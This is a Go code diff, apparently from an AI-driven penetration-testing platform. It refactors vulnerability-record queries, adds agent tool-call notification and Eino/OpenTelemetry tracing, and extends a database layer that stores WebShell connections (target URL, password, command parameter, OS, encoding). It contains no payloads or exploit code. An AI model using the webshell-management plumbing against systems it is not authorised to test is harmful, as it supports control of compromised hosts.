@@ -90,32 +169,18 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
} }
// ListVulnerabilities 列出漏洞 // ListVulnerabilities 列出漏洞
func (db *DB) ListVulnerabilities(limit, offset int, id, conversationID, severity, status string) ([]*Vulnerability, error) { func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) {
query := ` query := `
SELECT id, conversation_id, title, description, severity, status, SELECT id, conversation_id, title, description, severity, status, conversation_tag, task_tag,
vulnerability_type, target, proof, impact, recommendation, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
created_at, updated_at created_at, updated_at
FROM vulnerabilities FROM vulnerabilities
WHERE 1=1 WHERE 1=1
` `
args := []interface{}{} args := []interface{}{}
query, args = filter.appendWhere(query, args)
if id != "" {
query += " AND id = ?"
args = append(args, id)
}
if conversationID != "" {
query += " AND conversation_id = ?"
args = append(args, conversationID)
}
if severity != "" {
query += " AND severity = ?"
args = append(args, severity)
}
if status != "" {
query += " AND status = ?"
args = append(args, status)
}
query += " ORDER BY created_at DESC LIMIT ? OFFSET ?" query += " ORDER BY created_at DESC LIMIT ? OFFSET ?"
args = append(args, limit, offset) args = append(args, limit, offset)
@@ -131,8 +196,9 @@ func (db *DB) ListVulnerabilities(limit, offset int, id, conversationID, severit
var vuln Vulnerability var vuln Vulnerability
err := rows.Scan( err := rows.Scan(
&vuln.ID, &vuln.ConversationID, &vuln.Title, &vuln.Description, &vuln.ID, &vuln.ConversationID, &vuln.Title, &vuln.Description,
&vuln.Severity, &vuln.Status, &vuln.Type, &vuln.Target, &vuln.Severity, &vuln.Status, &vuln.ConversationTag, &vuln.TaskTag, &vuln.Type, &vuln.Target,
&vuln.Proof, &vuln.Impact, &vuln.Recommendation, &vuln.Proof, &vuln.Impact, &vuln.Recommendation,
&vuln.TaskID, &vuln.TaskQueueID,
&vuln.CreatedAt, &vuln.UpdatedAt, &vuln.CreatedAt, &vuln.UpdatedAt,
) )
if err != nil { if err != nil {
@@ -146,26 +212,10 @@ func (db *DB) ListVulnerabilities(limit, offset int, id, conversationID, severit
} }
// CountVulnerabilities 统计漏洞总数(支持筛选条件) // CountVulnerabilities 统计漏洞总数(支持筛选条件)
func (db *DB) CountVulnerabilities(id, conversationID, severity, status string) (int, error) { func (db *DB) CountVulnerabilities(filter VulnerabilityListFilter) (int, error) {
query := "SELECT COUNT(*) FROM vulnerabilities WHERE 1=1" query := "SELECT COUNT(*) FROM vulnerabilities WHERE 1=1"
args := []interface{}{} args := []interface{}{}
query, args = filter.appendWhere(query, args)
if id != "" {
query += " AND id = ?"
args = append(args, id)
}
if conversationID != "" {
query += " AND conversation_id = ?"
args = append(args, conversationID)
}
if severity != "" {
query += " AND severity = ?"
args = append(args, severity)
}
if status != "" {
query += " AND status = ?"
args = append(args, status)
}
var count int var count int
err := db.QueryRow(query, args...).Scan(&count) err := db.QueryRow(query, args...).Scan(&count)
@@ -182,7 +232,7 @@ func (db *DB) UpdateVulnerability(id string, vuln *Vulnerability) error {
query := ` query := `
UPDATE vulnerabilities UPDATE vulnerabilities
SET title = ?, description = ?, severity = ?, status = ?, SET conversation_tag = ?, task_tag = ?, title = ?, description = ?, severity = ?, status = ?,
vulnerability_type = ?, target = ?, proof = ?, impact = ?, vulnerability_type = ?, target = ?, proof = ?, impact = ?,
recommendation = ?, updated_at = ? recommendation = ?, updated_at = ?
WHERE id = ? WHERE id = ?
@@ -190,7 +240,7 @@ func (db *DB) UpdateVulnerability(id string, vuln *Vulnerability) error {
_, err := db.Exec( _, err := db.Exec(
query, query,
vuln.Title, vuln.Description, vuln.Severity, vuln.Status, vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description, vuln.Severity, vuln.Status,
vuln.Type, vuln.Target, vuln.Proof, vuln.Impact, vuln.Type, vuln.Target, vuln.Proof, vuln.Impact,
vuln.Recommendation, vuln.UpdatedAt, id, vuln.Recommendation, vuln.UpdatedAt, id,
) )
@@ -210,18 +260,17 @@ func (db *DB) DeleteVulnerability(id string) error {
return nil return nil
} }
// GetVulnerabilityStats 获取漏洞统计 // GetVulnerabilityStats 获取漏洞统计(筛选条件与 ListVulnerabilities / CountVulnerabilities 一致)
func (db *DB) GetVulnerabilityStats(conversationID string) (map[string]interface{}, error) { func (db *DB) GetVulnerabilityStats(filter VulnerabilityListFilter) (map[string]interface{}, error) {
stats := make(map[string]interface{}) stats := make(map[string]interface{})
where := "WHERE 1=1"
args := []interface{}{}
where, args = filter.appendWhere(where, args)
// 总漏洞数 // 总漏洞数
var totalCount int var totalCount int
query := "SELECT COUNT(*) FROM vulnerabilities" query := "SELECT COUNT(*) FROM vulnerabilities " + where
args := []interface{}{}
if conversationID != "" {
query += " WHERE conversation_id = ?"
args = append(args, conversationID)
}
err := db.QueryRow(query, args...).Scan(&totalCount) err := db.QueryRow(query, args...).Scan(&totalCount)
if err != nil { if err != nil {
return nil, fmt.Errorf("获取总漏洞数失败: %w", err) return nil, fmt.Errorf("获取总漏洞数失败: %w", err)
@@ -229,11 +278,7 @@ func (db *DB) GetVulnerabilityStats(conversationID string) (map[string]interface
stats["total"] = totalCount stats["total"] = totalCount
// 按严重程度统计 // 按严重程度统计
severityQuery := "SELECT severity, COUNT(*) FROM vulnerabilities" severityQuery := "SELECT severity, COUNT(*) FROM vulnerabilities " + where + " GROUP BY severity"
if conversationID != "" {
severityQuery += " WHERE conversation_id = ?"
}
severityQuery += " GROUP BY severity"
rows, err := db.Query(severityQuery, args...) rows, err := db.Query(severityQuery, args...)
if err != nil { if err != nil {
@@ -253,11 +298,7 @@ func (db *DB) GetVulnerabilityStats(conversationID string) (map[string]interface
stats["by_severity"] = severityStats stats["by_severity"] = severityStats
// 按状态统计 // 按状态统计
statusQuery := "SELECT status, COUNT(*) FROM vulnerabilities" statusQuery := "SELECT status, COUNT(*) FROM vulnerabilities " + where + " GROUP BY status"
if conversationID != "" {
statusQuery += " WHERE conversation_id = ?"
}
statusQuery += " GROUP BY status"
rows, err = db.Query(statusQuery, args...) rows, err = db.Query(statusQuery, args...)
if err != nil { if err != nil {
@@ -279,3 +320,59 @@ func (db *DB) GetVulnerabilityStats(conversationID string) (map[string]interface
return stats, nil return stats, nil
} }
// GetVulnerabilityFilterOptions 获取漏洞筛选建议项
func (db *DB) GetVulnerabilityFilterOptions() (map[string][]string, error) {
collect := func(query string, args ...interface{}) ([]string, error) {
rows, err := db.Query(query, args...)
if err != nil {
return nil, err
}
defer rows.Close()
items := make([]string, 0)
for rows.Next() {
var val string
if err := rows.Scan(&val); err != nil {
continue
}
if val == "" {
continue
}
items = append(items, val)
}
return items, nil
}
vulnIDs, err := collect(`SELECT DISTINCT id FROM vulnerabilities ORDER BY created_at DESC LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err)
}
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询会话ID建议失败: %w", err)
}
taskIDs, err := collect(`SELECT DISTINCT id FROM batch_tasks WHERE id <> '' ORDER BY rowid DESC LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询任务ID建议失败: %w", err)
}
queueIDs, err := collect(`SELECT DISTINCT queue_id FROM batch_tasks WHERE queue_id <> '' ORDER BY rowid DESC LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询队列ID建议失败: %w", err)
}
conversationTags, err := collect(`SELECT DISTINCT conversation_tag FROM vulnerabilities WHERE conversation_tag IS NOT NULL AND conversation_tag <> '' ORDER BY conversation_tag LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询对话标签建议失败: %w", err)
}
taskTags, err := collect(`SELECT DISTINCT task_tag FROM vulnerabilities WHERE task_tag IS NOT NULL AND task_tag <> '' ORDER BY task_tag LIMIT 500`)
if err != nil {
return nil, fmt.Errorf("查询任务标签建议失败: %w", err)
}
return map[string][]string{
"vulnerability_ids": vulnIDs,
"conversation_ids": conversationIDs,
"task_ids": taskIDs,
"queue_ids": queueIDs,
"conversation_tags": conversationTags,
"task_tags": taskTags,
}, nil
}
+13 -9
View File
@@ -16,6 +16,8 @@ type WebShellConnection struct {
Method string `json:"method"` Method string `json:"method"`
CmdParam string `json:"cmdParam"` CmdParam string `json:"cmdParam"`
Remark string `json:"remark"` Remark string `json:"remark"`
Encoding string `json:"encoding"` // 目标响应编码:auto / utf-8 / gbk / gb18030,空值视为 auto
OS string `json:"os"` // 目标操作系统:auto / linux / windows,空值/未知视为 auto
CreatedAt time.Time `json:"createdAt"` CreatedAt time.Time `json:"createdAt"`
} }
@@ -58,7 +60,8 @@ func (db *DB) UpsertWebshellConnectionState(connectionID, stateJSON string) erro
// ListWebshellConnections 列出所有 WebShell 连接,按创建时间倒序 // ListWebshellConnections 列出所有 WebShell 连接,按创建时间倒序
func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) { func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) {
query := ` query := `
SELECT id, url, password, type, method, cmd_param, remark, created_at SELECT id, url, password, type, method, cmd_param, remark,
COALESCE(encoding, '') AS encoding, COALESCE(os, '') AS os, created_at
FROM webshell_connections FROM webshell_connections
ORDER BY created_at DESC ORDER BY created_at DESC
` `
@@ -72,7 +75,7 @@ func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) {
var list []WebShellConnection var list []WebShellConnection
for rows.Next() { for rows.Next() {
var c WebShellConnection var c WebShellConnection
err := rows.Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.CreatedAt) err := rows.Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.Encoding, &c.OS, &c.CreatedAt)
if err != nil { if err != nil {
db.logger.Warn("扫描 WebShell 连接行失败", zap.Error(err)) db.logger.Warn("扫描 WebShell 连接行失败", zap.Error(err))
continue continue
@@ -85,11 +88,12 @@ func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) {
// GetWebshellConnection 根据 ID 获取一条连接 // GetWebshellConnection 根据 ID 获取一条连接
func (db *DB) GetWebshellConnection(id string) (*WebShellConnection, error) { func (db *DB) GetWebshellConnection(id string) (*WebShellConnection, error) {
query := ` query := `
SELECT id, url, password, type, method, cmd_param, remark, created_at SELECT id, url, password, type, method, cmd_param, remark,
COALESCE(encoding, '') AS encoding, COALESCE(os, '') AS os, created_at
FROM webshell_connections WHERE id = ? FROM webshell_connections WHERE id = ?
` `
var c WebShellConnection var c WebShellConnection
err := db.QueryRow(query, id).Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.CreatedAt) err := db.QueryRow(query, id).Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.Encoding, &c.OS, &c.CreatedAt)
if err == sql.ErrNoRows { if err == sql.ErrNoRows {
return nil, nil return nil, nil
} }
@@ -103,10 +107,10 @@ func (db *DB) GetWebshellConnection(id string) (*WebShellConnection, error) {
// CreateWebshellConnection 创建 WebShell 连接 // CreateWebshellConnection 创建 WebShell 连接
func (db *DB) CreateWebshellConnection(c *WebShellConnection) error { func (db *DB) CreateWebshellConnection(c *WebShellConnection) error {
query := ` query := `
INSERT INTO webshell_connections (id, url, password, type, method, cmd_param, remark, created_at) INSERT INTO webshell_connections (id, url, password, type, method, cmd_param, remark, encoding, os, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?, ?) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
` `
_, err := db.Exec(query, c.ID, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.CreatedAt) _, err := db.Exec(query, c.ID, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.Encoding, c.OS, c.CreatedAt)
if err != nil { if err != nil {
db.logger.Error("创建 WebShell 连接失败", zap.Error(err), zap.String("id", c.ID)) db.logger.Error("创建 WebShell 连接失败", zap.Error(err), zap.String("id", c.ID))
return err return err
@@ -118,10 +122,10 @@ func (db *DB) CreateWebshellConnection(c *WebShellConnection) error {
func (db *DB) UpdateWebshellConnection(c *WebShellConnection) error { func (db *DB) UpdateWebshellConnection(c *WebShellConnection) error {
query := ` query := `
UPDATE webshell_connections UPDATE webshell_connections
SET url = ?, password = ?, type = ?, method = ?, cmd_param = ?, remark = ? SET url = ?, password = ?, type = ?, method = ?, cmd_param = ?, remark = ?, encoding = ?, os = ?
WHERE id = ? WHERE id = ?
` `
result, err := db.Exec(query, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.ID) result, err := db.Exec(query, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.Encoding, c.OS, c.ID)
if err != nil { if err != nil {
db.logger.Error("更新 WebShell 连接失败", zap.Error(err), zap.String("id", c.ID)) db.logger.Error("更新 WebShell 连接失败", zap.Error(err), zap.String("id", c.ID))
return err return err
+45 -18
View File
@@ -23,12 +23,16 @@ type ExecutionRecorder func(executionID string)
const ToolErrorPrefix = "__CYBERSTRIKE_AI_TOOL_ERROR__\n" const ToolErrorPrefix = "__CYBERSTRIKE_AI_TOOL_ERROR__\n"
// ToolsFromDefinitions 将单 Agent 使用的 OpenAI 风格工具定义转为 Eino InvokableTool,执行时走 Agent 的 MCP 路径。 // ToolsFromDefinitions 将单 Agent 使用的 OpenAI 风格工具定义转为 Eino InvokableTool,执行时走 Agent 的 MCP 路径。
// invokeNotify 可选:与 runEinoADKAgentLoop 共享,在 InvokableRun 返回时触发 UI 与 pending 清理(与 ADK Tool 事件去重)。
// einoAgentName 为该套工具所属 ChatModelAgent 的 Name(主代理或子代理 id),用于 SSE 上的 einoAgent 字段。
func ToolsFromDefinitions( func ToolsFromDefinitions(
ag *agent.Agent, ag *agent.Agent,
holder *ConversationHolder, holder *ConversationHolder,
defs []agent.Tool, defs []agent.Tool,
rec ExecutionRecorder, rec ExecutionRecorder,
toolOutputChunk func(toolName, toolCallID, chunk string), toolOutputChunk func(toolName, toolCallID, chunk string),
invokeNotify *ToolInvokeNotifyHolder,
einoAgentName string,
) ([]tool.BaseTool, error) { ) ([]tool.BaseTool, error) {
out := make([]tool.BaseTool, 0, len(defs)) out := make([]tool.BaseTool, 0, len(defs))
for _, d := range defs { for _, d := range defs {
@@ -40,12 +44,14 @@ func ToolsFromDefinitions(
return nil, fmt.Errorf("tool %q: %w", d.Function.Name, err) return nil, fmt.Errorf("tool %q: %w", d.Function.Name, err)
} }
out = append(out, &mcpBridgeTool{ out = append(out, &mcpBridgeTool{
info: info, info: info,
name: d.Function.Name, name: d.Function.Name,
agent: ag, agent: ag,
holder: holder, holder: holder,
record: rec, record: rec,
chunk: toolOutputChunk, chunk: toolOutputChunk,
invokeNotify: invokeNotify,
einoAgentName: strings.TrimSpace(einoAgentName),
}) })
} }
return out, nil return out, nil
@@ -77,12 +83,14 @@ func toolInfoFromDefinition(d agent.Tool) (*schema.ToolInfo, error) {
} }
type mcpBridgeTool struct { type mcpBridgeTool struct {
info *schema.ToolInfo info *schema.ToolInfo
name string name string
agent *agent.Agent agent *agent.Agent
holder *ConversationHolder holder *ConversationHolder
record ExecutionRecorder record ExecutionRecorder
chunk func(toolName, toolCallID, chunk string) chunk func(toolName, toolCallID, chunk string)
invokeNotify *ToolInvokeNotifyHolder
einoAgentName string
} }
func (m *mcpBridgeTool) Info(ctx context.Context) (*schema.ToolInfo, error) { func (m *mcpBridgeTool) Info(ctx context.Context) (*schema.ToolInfo, error) {
@@ -90,8 +98,27 @@ func (m *mcpBridgeTool) Info(ctx context.Context) (*schema.ToolInfo, error) {
return m.info, nil return m.info, nil
} }
func (m *mcpBridgeTool) InvokableRun(ctx context.Context, argumentsInJSON string, opts ...tool.Option) (string, error) { func (m *mcpBridgeTool) InvokableRun(ctx context.Context, argumentsInJSON string, opts ...tool.Option) (out string, err error) {
_ = opts _ = opts
toolCallID := compose.GetToolCallID(ctx)
defer func() {
if m.invokeNotify == nil {
return
}
tid := strings.TrimSpace(toolCallID)
if tid == "" {
return
}
success := err == nil && !strings.HasPrefix(out, ToolErrorPrefix)
body := out
if err != nil {
success = false
} else if strings.HasPrefix(out, ToolErrorPrefix) {
success = false
body = strings.TrimPrefix(out, ToolErrorPrefix)
}
m.invokeNotify.Fire(tid, m.name, m.einoAgentName, success, body, err)
}()
return runMCPToolInvocation(ctx, m.agent, m.holder, m.name, argumentsInJSON, m.record, m.chunk) return runMCPToolInvocation(ctx, m.agent, m.holder, m.name, argumentsInJSON, m.record, m.chunk)
} }
@@ -160,17 +187,17 @@ func runMCPToolInvocation(
} }
// UnknownToolReminderHandler 供 compose.ToolsNodeConfig.UnknownToolsHandler 使用: // UnknownToolReminderHandler 供 compose.ToolsNodeConfig.UnknownToolsHandler 使用:
// 模型请求了未注册的工具名时,返回一个「可恢复」的错误,让上层 runner 触发重试与纠错提示 // 模型请求了未注册的工具名时,返回一个「软错误」工具结果(nil error
// 同时避免 UI 永远停留在“执行中”(runner 会在 recoverable 分支 flush 掉 pending 的 tool_call // 让模型在同一轮继续自我修正,避免触发 run-loop 级别的 full rerun
// 不进行名称猜测或映射,避免误执行。 // 不进行名称猜测或映射,避免误执行。
func UnknownToolReminderHandler() func(ctx context.Context, name, input string) (string, error) { func UnknownToolReminderHandler() func(ctx context.Context, name, input string) (string, error) {
return func(ctx context.Context, name, input string) (string, error) { return func(ctx context.Context, name, input string) (string, error) {
_ = ctx _ = ctx
_ = input _ = input
requested := strings.TrimSpace(name) requested := strings.TrimSpace(name)
// Return a recoverable error that still carries a friendly, bilingual hint. // Return a soft tool-result error so the graph keeps running and the LLM
// This will be caught by multiagent runner as "tool not found" and trigger a retry. // can correct tool name/arguments within the same run.
return "", fmt.Errorf("tool %q not found: %s", requested, unknownToolReminderText(requested)) return ToolErrorPrefix + unknownToolReminderText(requested), nil
} }
} }
+39
View File
@@ -0,0 +1,39 @@
package einomcp
import "sync"
// ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP 桥在每次 InvokableRun 结束时 Fire
// 用于在 ADK 未透出 schema.Tool 事件时仍推送 tool_result、清 pending,避免 UI 卡在「执行中」或迭代末 force-close。
type ToolInvokeNotifyHolder struct {
mu sync.RWMutex
fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)
}
// NewToolInvokeNotifyHolder 创建可在 ToolsFromDefinitions 与 run loop 之间共享的 holder。
func NewToolInvokeNotifyHolder() *ToolInvokeNotifyHolder {
return &ToolInvokeNotifyHolder{}
}
// Set 由 runEinoADKAgentLoop 在开始消费 iter 之前调用;可多次覆盖(通常仅一次)。
func (h *ToolInvokeNotifyHolder) Set(fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)) {
if h == nil {
return
}
h.mu.Lock()
defer h.mu.Unlock()
h.fn = fn
}
// Fire 由 mcpBridgeTool 在工具调用返回时调用;若尚未 Set 或 toolCallID 为空则忽略。
func (h *ToolInvokeNotifyHolder) Fire(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
if h == nil {
return
}
h.mu.RLock()
fn := h.fn
h.mu.RUnlock()
if fn == nil {
return
}
fn(toolCallID, toolName, einoAgent, success, content, invokeErr)
}
+435
View File
@@ -0,0 +1,435 @@
// Package einoobserve attaches CloudWeGo Eino [callbacks.Handler] to ADK Runner contexts for
// structured logging and optional SSE trace events (eino_trace_*).
package einoobserve
import (
"context"
"encoding/json"
"fmt"
"strings"
"sync"
"sync/atomic"
"time"
"cyberstrike-ai/internal/config"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/callbacks"
"github.com/cloudwego/eino/components"
"github.com/cloudwego/eino/components/model"
"github.com/cloudwego/eino/components/tool"
"github.com/cloudwego/eino/schema"
"github.com/google/uuid"
"go.opentelemetry.io/otel"
"go.opentelemetry.io/otel/attribute"
"go.opentelemetry.io/otel/codes"
"go.opentelemetry.io/otel/trace"
"go.uber.org/zap"
)
type ctxSpanKey struct{}
type ctxOtelSpanKey struct{}
// Params for attaching per-run callback instrumentation.
type Params struct {
Logger *zap.Logger
Progress func(eventType, message string, data interface{})
ConversationID string
OrchMode string
OrchestratorName string
}
// AttachAgentRunCallbacks returns ctx wrapped with callbacks.InitCallbacks when enabled.
// Safe to call with nil cfg or disabled cfg (returns ctx unchanged).
func AttachAgentRunCallbacks(ctx context.Context, cfg *config.MultiAgentEinoCallbacksConfig, p Params) context.Context {
if ctx == nil {
return ctx
}
if cfg == nil || !cfg.Enabled {
return ctx
}
mode := cfg.EinoCallbacksModeEffective()
if mode == "off" {
return ctx
}
runID := uuid.New().String()
if p.Progress != nil && cfg.ShouldEmitEinoTraceSSE(mode) {
p.Progress("eino_trace_run", "Eino callbacks session", map[string]interface{}{
"runId": runID,
"conversationId": strings.TrimSpace(p.ConversationID),
"orchestration": strings.TrimSpace(p.OrchMode),
"orchestratorName": strings.TrimSpace(p.OrchestratorName),
"observeMode": mode,
"source": "eino_callbacks",
})
}
h := &runHandler{
cfg: *cfg,
mode: mode,
params: p,
runID: runID,
}
b := callbacks.NewHandlerBuilder().
OnStartFn(h.onStart).
OnEndFn(h.onEnd).
OnErrorFn(h.onError)
if mode == "full" {
b = b.OnStartWithStreamInputFn(h.onStartStreamIn).OnEndWithStreamOutputFn(h.onEndStreamOut)
}
ri := &callbacks.RunInfo{
Name: "CyberStrikeADKRun",
Type: strings.TrimSpace(p.OrchMode),
Component: components.Component("AgentSession"),
}
return callbacks.InitCallbacks(ctx, ri, b.Build())
}
type runHandler struct {
cfg config.MultiAgentEinoCallbacksConfig
mode string
params Params
runID string
mu sync.Mutex
spanStack []string
seq atomic.Uint64
}
func (h *runHandler) genSpanID() string {
return fmt.Sprintf("%s-%d", h.runID, h.seq.Add(1))
}
func (h *runHandler) popSpan() (id string) {
h.mu.Lock()
defer h.mu.Unlock()
if len(h.spanStack) == 0 {
return ""
}
id = h.spanStack[len(h.spanStack)-1]
h.spanStack = h.spanStack[:len(h.spanStack)-1]
return id
}
// popMatching removes the given id from the stack top if it matches; otherwise pops until empty or match (rare ordering mismatch).
func (h *runHandler) popMatching(want string) string {
h.mu.Lock()
defer h.mu.Unlock()
if want == "" {
if len(h.spanStack) == 0 {
return ""
}
id := h.spanStack[len(h.spanStack)-1]
h.spanStack = h.spanStack[:len(h.spanStack)-1]
return id
}
for len(h.spanStack) > 0 {
top := h.spanStack[len(h.spanStack)-1]
h.spanStack = h.spanStack[:len(h.spanStack)-1]
if top == want {
return top
}
}
return want
}
func (h *runHandler) onStart(ctx context.Context, info *callbacks.RunInfo, input callbacks.CallbackInput) context.Context {
var parentID string
h.mu.Lock()
if len(h.spanStack) > 0 {
parentID = h.spanStack[len(h.spanStack)-1]
}
spanID := h.genSpanID()
h.spanStack = append(h.spanStack, spanID)
h.mu.Unlock()
inSum := summarizeCallbackInput(input, h.cfg.EinoCallbacksMaxInputSummaryRunes())
if h.cfg.OtelTracingActive() {
tracer := otel.Tracer("cyberstrike/eino")
spanName := callbackSpanName(info)
var sp trace.Span
ctx, sp = tracer.Start(ctx, spanName,
trace.WithSpanKind(trace.SpanKindInternal),
trace.WithAttributes(
attribute.String("eino.component", string(info.Component)),
attribute.String("eino.name", info.Name),
attribute.String("eino.type", info.Type),
attribute.String("cyberstrike.run_id", h.runID),
attribute.String("cyberstrike.conversation_id", strings.TrimSpace(h.params.ConversationID)),
attribute.String("cyberstrike.orchestration", strings.TrimSpace(h.params.OrchMode)),
),
)
if inSum != "" {
sp.SetAttributes(attribute.String("eino.input.summary", truncateForAttr(inSum, 256)))
}
ctx = context.WithValue(ctx, ctxOtelSpanKey{}, sp)
}
if h.params.Logger != nil {
fields := []zap.Field{
zap.String("runId", h.runID),
zap.String("spanId", spanID),
zap.String("parentSpanId", parentID),
zap.String("component", string(info.Component)),
zap.String("name", info.Name),
zap.String("type", info.Type),
zap.String("phase", "start"),
}
if sp, ok := ctx.Value(ctxOtelSpanKey{}).(trace.Span); ok && sp != nil {
if sc := sp.SpanContext(); sc.IsValid() {
fields = append(fields,
zap.String("trace_id", sc.TraceID().String()),
zap.String("otel_span_id", sc.SpanID().String()),
)
}
}
if h.cfg.ZapVerbose {
h.params.Logger.Debug("eino_callback", append(fields, zap.String("inputSummary", inSum))...)
} else {
h.params.Logger.Info("eino_callback", fields...)
}
}
if h.params.Progress != nil && h.cfg.ShouldEmitEinoTraceSSE(h.mode) {
h.params.Progress("eino_trace_start", "", map[string]interface{}{
"runId": h.runID,
"spanId": spanID,
"parentSpanId": parentID,
"conversationId": strings.TrimSpace(h.params.ConversationID),
"orchestration": strings.TrimSpace(h.params.OrchMode),
"component": string(info.Component),
"name": info.Name,
"type": info.Type,
"ts": time.Now().UTC().Format(time.RFC3339Nano),
"inputSummary": inSum,
"source": "eino_callbacks",
})
}
ctx = context.WithValue(ctx, ctxSpanKey{}, spanID)
return ctx
}
func (h *runHandler) onEnd(ctx context.Context, info *callbacks.RunInfo, output callbacks.CallbackOutput) context.Context {
spanID, _ := ctx.Value(ctxSpanKey{}).(string)
if spanID == "" {
spanID = h.popSpan()
} else {
spanID = h.popMatching(spanID)
}
outSum := summarizeCallbackOutput(output, h.cfg.EinoCallbacksMaxOutputSummaryRunes())
if sp, ok := ctx.Value(ctxOtelSpanKey{}).(trace.Span); ok && sp != nil {
if outSum != "" {
sp.SetAttributes(attribute.String("eino.output.summary", truncateForAttr(outSum, 256)))
}
sp.SetStatus(codes.Ok, "")
sp.End()
}
if h.params.Logger != nil {
fields := []zap.Field{
zap.String("runId", h.runID),
zap.String("spanId", spanID),
zap.String("component", string(info.Component)),
zap.String("name", info.Name),
zap.String("type", info.Type),
zap.String("phase", "end"),
}
if h.cfg.ZapVerbose {
h.params.Logger.Debug("eino_callback", append(fields, zap.String("outputSummary", outSum))...)
} else {
h.params.Logger.Info("eino_callback", fields...)
}
}
if h.params.Progress != nil && h.cfg.ShouldEmitEinoTraceSSE(h.mode) {
h.params.Progress("eino_trace_end", "", map[string]interface{}{
"runId": h.runID,
"spanId": spanID,
"conversationId": strings.TrimSpace(h.params.ConversationID),
"orchestration": strings.TrimSpace(h.params.OrchMode),
"component": string(info.Component),
"name": info.Name,
"type": info.Type,
"ts": time.Now().UTC().Format(time.RFC3339Nano),
"outputSummary": outSum,
"source": "eino_callbacks",
})
}
return ctx
}
func (h *runHandler) onError(ctx context.Context, info *callbacks.RunInfo, err error) context.Context {
spanID, _ := ctx.Value(ctxSpanKey{}).(string)
if spanID == "" {
spanID = h.popSpan()
} else {
spanID = h.popMatching(spanID)
}
msg := ""
if err != nil {
msg = truncateRunes(err.Error(), h.cfg.EinoCallbacksMaxOutputSummaryRunes())
}
if sp, ok := ctx.Value(ctxOtelSpanKey{}).(trace.Span); ok && sp != nil {
if err != nil {
sp.RecordError(err)
}
sp.SetStatus(codes.Error, msg)
sp.End()
}
if h.params.Logger != nil {
h.params.Logger.Warn("eino_callback_error",
zap.String("runId", h.runID),
zap.String("spanId", spanID),
zap.String("component", string(info.Component)),
zap.String("name", info.Name),
zap.String("type", info.Type),
zap.Error(err),
)
}
if h.params.Progress != nil && h.cfg.ShouldEmitEinoTraceSSE(h.mode) {
h.params.Progress("eino_trace_error", msg, map[string]interface{}{
"runId": h.runID,
"spanId": spanID,
"conversationId": strings.TrimSpace(h.params.ConversationID),
"orchestration": strings.TrimSpace(h.params.OrchMode),
"component": string(info.Component),
"name": info.Name,
"type": info.Type,
"ts": time.Now().UTC().Format(time.RFC3339Nano),
"error": msg,
"source": "eino_callbacks",
})
}
return ctx
}
func (h *runHandler) onStartStreamIn(ctx context.Context, info *callbacks.RunInfo, input *schema.StreamReader[callbacks.CallbackInput]) context.Context {
if input != nil {
input.Close()
}
if h.params.Logger != nil {
h.params.Logger.Debug("eino_callback_stream_in",
zap.String("runId", h.runID),
zap.String("component", string(info.Component)),
zap.String("name", info.Name),
)
}
return ctx
}
func (h *runHandler) onEndStreamOut(ctx context.Context, info *callbacks.RunInfo, output *schema.StreamReader[callbacks.CallbackOutput]) context.Context {
if output != nil {
output.Close()
}
if h.params.Logger != nil {
h.params.Logger.Debug("eino_callback_stream_out",
zap.String("runId", h.runID),
zap.String("component", string(info.Component)),
zap.String("name", info.Name),
)
}
return ctx
}
func callbackSpanName(info *callbacks.RunInfo) string {
if info == nil {
return "eino.callback"
}
comp := strings.TrimSpace(string(info.Component))
name := strings.TrimSpace(info.Name)
typ := strings.TrimSpace(info.Type)
if name != "" && comp != "" {
return comp + "/" + name
}
if typ != "" && comp != "" {
return comp + "[" + typ + "]"
}
if comp != "" {
return comp
}
return "eino.callback"
}
func truncateForAttr(s string, maxRunes int) string {
return truncateRunes(s, maxRunes)
}
func summarizeCallbackInput(in callbacks.CallbackInput, maxRunes int) string {
if in == nil {
return ""
}
if ai := adk.ConvAgentCallbackInput(in); ai != nil {
parts := []string{"agent"}
if ai.Input != nil {
parts = append(parts, fmt.Sprintf("messages=%d", len(ai.Input.Messages)))
}
if ai.ResumeInfo != nil {
parts = append(parts, "resume=true")
}
return strings.Join(parts, " ")
}
if mi := model.ConvCallbackInput(in); mi != nil {
return fmt.Sprintf("chatModel messages=%d tools=%d", len(mi.Messages), len(mi.Tools))
}
if ti := tool.ConvCallbackInput(in); ti != nil {
raw := ti.ArgumentsInJSON
return "tool args=" + truncateRunes(raw, maxRunes)
}
